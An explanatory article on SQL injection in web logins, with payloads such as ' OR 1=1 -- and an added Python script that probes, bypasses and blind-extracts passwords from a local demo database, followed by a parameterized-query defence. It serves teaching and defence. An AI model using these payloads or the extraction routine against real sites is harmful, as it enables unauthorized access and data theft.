SQL injection is a vulnerability in the way a web application builds its database queries, not a hole in the database product itself. It arises when text typed into ordinary input fields (a login form, a search box, a URL parameter) is pasted directly into the SQL text sent to the database, so that a user can supply SQL syntax as well as data. The root cause is that many applications neither validate user input nor keep it separate from the query before handing it to the SQL engine. With a little time and patience an attacker can use this to read, and often modify, the entire database.
Description of the attack
SQL injection attacks come in several forms. The major ones are listed below.
• Incorrectly parsed inputs
This happens when user input is not checked against what the application actually expects and is inserted into the query as-is. Conditions such as 1=1 or 'x'='x' are always true in an SQL WHERE clause, so injecting them into a login form's fields can make the authentication query match without a valid password.
• Unchecked types and error messages
In other cases the application does not check the type of the data the user supplies: for example text submitted in a date field, which the query then tries to compare with a date or numeric column. If type checking and error handling are missing, the database's error message is sent back to the browser, and that message (the database product, table and column names, fragments of the query) gives the attacker details he needs to refine the attack.
• Blind attacks
These are attacks where the page displays no query results at all, but the attacker can still infer a large amount of information from the application's behaviour. For example, he can inject a condition and observe whether the page changes (boolean-based), or inject a deliberate delay and time the response (time-based); either way each request answers one true/false question about the data.

How it is used by hackers
The first step is to determine whether the application is vulnerable. This is done by entering a character such as a single quote (') or a double quote (") in the user name field; other SQL metacharacters can be used for the same purpose. If the input reaches the query unescaped, the page returns a database error instead of the usual "invalid user name" message, looking something like the figure above.
Once the vulnerability has been confirmed, the attacker can enter combinations that log him in without knowing a password. Most applications have an "admin" account or some variation of it. That user name can be combined with a password value that makes the WHERE clause always true, such as
anything' OR 'x'='x
' OR 1=1 --
The first closes the password string and adds a condition that is true for every row; in the second the comment marker -- discards whatever the page appends after the injected text. Many other combinations work. For example, the following can be used as credentials: Username: ' or 1=1 -- Password: ' or 1=1 --
Yet another combination that may work is: Username: me Password: anything' OR 'x'='x
Many other such combinations exist. The important point is that the database error obtained in the first step (as shown in the figure) tells the attacker which database product is in use and how his input is being quoted, so he can adapt the payload to that database's comment syntax and string handling.
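The probe, the always-true payloads listed above, and a blind attack of the kind described in the list of attack types, as an added example that is not part of the original post. It is a Python script against an in-memory SQLite database with constructed sample rows (admin inserted first, so a query that matches every row logs in as admin); the login function builds its query by string concatenation exactly as a vulnerable page would. The blind attack shown is boolean-based rather than time-based, since SQLite has no delay function to time; the table and column names and the use of SQLite's substr are assumptions for this example.

```python
import sqlite3
import string

# Constructed sample data for this example, not taken from the original post.
# The admin row is inserted first so that a query matching every row "logs in" as admin.
USERS = [("admin", "s3cr3t!"), ("alice", "wonderland")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return con


def vulnerable_login(con, username, password):
    """The injection point: form fields are concatenated straight into the SQL text.
    Returns the user name of the first matching row, or None, as a login page would."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def probe(con, username):
    """Step 1 of the attack: submit a lone quote. If the input reaches the query
    unescaped, the database rejects the malformed SQL; a page with poor error
    handling shows that message instead of "invalid user name". Returns the
    error text, or None when the input caused no database error."""
    try:
        vulnerable_login(con, username, "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


# Step 2: the always-true payloads from the text. Each pair either turns the
# WHERE clause into a tautology or comments out the password check with "--".
TAUTOLOGY_CREDENTIALS = [
    ("admin", "anything' OR 'x'='x"),
    ("admin", "' OR 1=1 --"),
    ("' or 1=1 --", "' or 1=1 --"),
    ("me", "anything' OR 'x'='x"),
]


def try_tautologies(con):
    """Returns the account each payload pair logs in as (None where it failed)."""
    return [vulnerable_login(con, u, p) for u, p in TAUTOLOGY_CREDENTIALS]


def vulnerable_user_exists(con, username):
    """A page that displays no rows, only "user exists" / "not found": the
    yes/no oracle that a blind attack needs. Same concatenation flaw as above."""
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return con.execute(sql).fetchone() is not None


def blind_extract_password(con, target, alphabet=string.printable.strip(), max_len=32):
    """Boolean-based blind injection: one true/false question per character.
    Injected condition:  <target>' AND substr(password, i, 1) = '<c>' --
    (SQLite's substr is 1-based; the trailing -- comments out the page's own quote)."""
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in alphabet:
            if ch == "'":  # a quote would break the attacker's own string; skipped here
                continue
            payload = f"{target}' AND substr(password, {position}, 1) = '{ch}' --"
            if vulnerable_user_exists(con, payload):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the password
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("probe with a quote ->", probe(db, "'"))
    print("tautology logins   ->", try_tautologies(db))
    print("blind extraction   ->", blind_extract_password(db, "admin"))
```

Run it and all four payload pairs come back as "admin" because the tautology matches every row and the page takes the first one; the blind routine recovers the admin password one character at a time without ever seeing a row displayed. Against MySQL the comment marker needs a trailing space (`-- `), which is exactly the kind of detail the error message from the probe step reveals.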
Some pages check login details in JavaScript running in the browser. In that case the page source can be saved to the attacker's machine and edited so that the calls to the validation functions are removed, or the request can simply be sent to the server directly; checks that run in the browser therefore do nothing to protect the query.
Access provided by a successful attack
An attacker who succeeds in logging in has access to whatever that user can see. If he logs in as "admin" he will typically have unlimited privileges, from viewing the data to modifying or deleting it. With a tautology payload the attacker is normally logged in as the first account returned by the query, that is, the first row of the user table, which is often the administrator. In either case he gets the complete record for that user, which may include the address, phone numbers or even social security numbers.
Defending against SQL attacks
The most reliable defence is never to build SQL text from user input. With parameterized queries (prepared statements) the structure of the query is fixed in advance and the user's values are sent to the database separately, so characters such as quotes or the equals sign (=) in the input are just data and can never change what the query does. Escaping those characters by hand is error-prone and should only be a fallback. In addition the application should validate every field against what it expects (type, allowed characters, length), and the database account the application connects with should have only the privileges it needs, so that a successful injection cannot read or modify everything.
For pages that do their checking in JavaScript, the credential verification must happen on the server, not in code delivered to the browser, since anything the browser receives the attacker can read and edit. The login page should also be served over TLS so that credentials are encrypted in transit.
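The defence described above, as an added example that is not part of the original post: the login rewritten in Python against an in-memory SQLite database with constructed sample accounts. The query is parameterized so the input can never alter its structure; the user name is checked against an allow-list and the password against a length limit; and the server stores a salted PBKDF2 hash and compares it itself, rather than trusting a check in the browser. The field rules, the hashing scheme and the table layout are assumptions for this example, not something the original specifies.

```python
import hashlib
import hmac
import os
import re
import sqlite3

PBKDF2_ROUNDS = 100_000  # assumption for this example; tune to your hardware


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as "salthex:digesthex"."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt.hex() + ":" + digest.hex()


def verify_password(password, stored):
    """Constant-time comparison of the recomputed digest with the stored one."""
    salt_hex, digest_hex = stored.split(":", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed sample accounts for this example (not from the original post).
USERS = [("admin", "s3cr3t!"), ("alice", "wonderland")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pwhash TEXT)")
    con.executemany("INSERT INTO users (username, pwhash) VALUES (?, ?)",
                    [(u, hash_password(p)) for u, p in USERS])
    return con


# Allow-list for the user name field: letters, digits, dot, underscore, hyphen,
# 1 to 32 characters. Quotes, spaces, "=" and "--" can never pass it.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")
MAX_PASSWORD_LEN = 128


def validate_username(username):
    return USERNAME_RE.fullmatch(username) is not None


def lookup_user(con, username):
    """Parameterized query: the SQL text is a constant and the value travels
    separately, so a quote in `username` is compared as data, never parsed."""
    return con.execute("SELECT username, pwhash FROM users WHERE username = ?",
                       (username,)).fetchone()


def safe_login(con, username, password):
    """Server-side check: validate the fields, look the user up with a
    parameterized query, then verify the hash. Returns the user name on
    success, otherwise None (the caller shows a generic failure message)."""
    if not validate_username(username) or len(password) > MAX_PASSWORD_LEN:
        return None
    row = lookup_user(con, username)
    if row is None or not verify_password(password, row[1]):
        return None
    return row[0]


if __name__ == "__main__":
    db = make_db()
    for creds in [("alice", "wonderland"), ("me", "anything' OR 'x'='x"),
                  ("' or 1=1 --", "' or 1=1 --"), ("admin", "' OR 1=1 --")]:
        print(creds, "->", safe_login(db, *creds))
```

Note that the validation is a second layer, not the thing that stops the injection: `lookup_user` alone, given `' OR 1=1 --` as the user name, returns no row because the database looks for an account literally named that. The allow-list and length limit are there to reject obviously malformed input early and to keep error messages away from the attacker, as the text recommends.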
Examples of successful attacks
A recent incident occurred on August 12, 2007, when the United Nations website was defaced. The attackers posted their own message on the UN home page asking the US and Israel to stop the war. An interesting detail of the posted message is that it contains almost no quote characters, not even the apostrophe in "don't"; this is consistent with SQL injection, since a quote inside the injected text would have terminated the attacker's string and broken the rest of his command.
Another example is the Microsoft UK website, attacked on 29 June 2007, where SQL injection is suspected to have been the method. The attacker replaced several sections of the site with graphics relating to Saudi Arabia. HTML is said to have been injected through the SQL engine into content stored in the database, so the new markup was served every time a page was generated from it. The attack is said to have taken advantage of a vulnerability associated with the site's use of Microsoft SQL Server.
Conclusion
SQL injection is one of the most popular and easiest attacks, and can be carried out by a novice with some patience and time. Website developers and database administrators should take care to ensure that their systems are not exposed to it, using the methods outlined above. A company that wants to prevent these attacks must also be ready to provide proper security training to its web and database teams.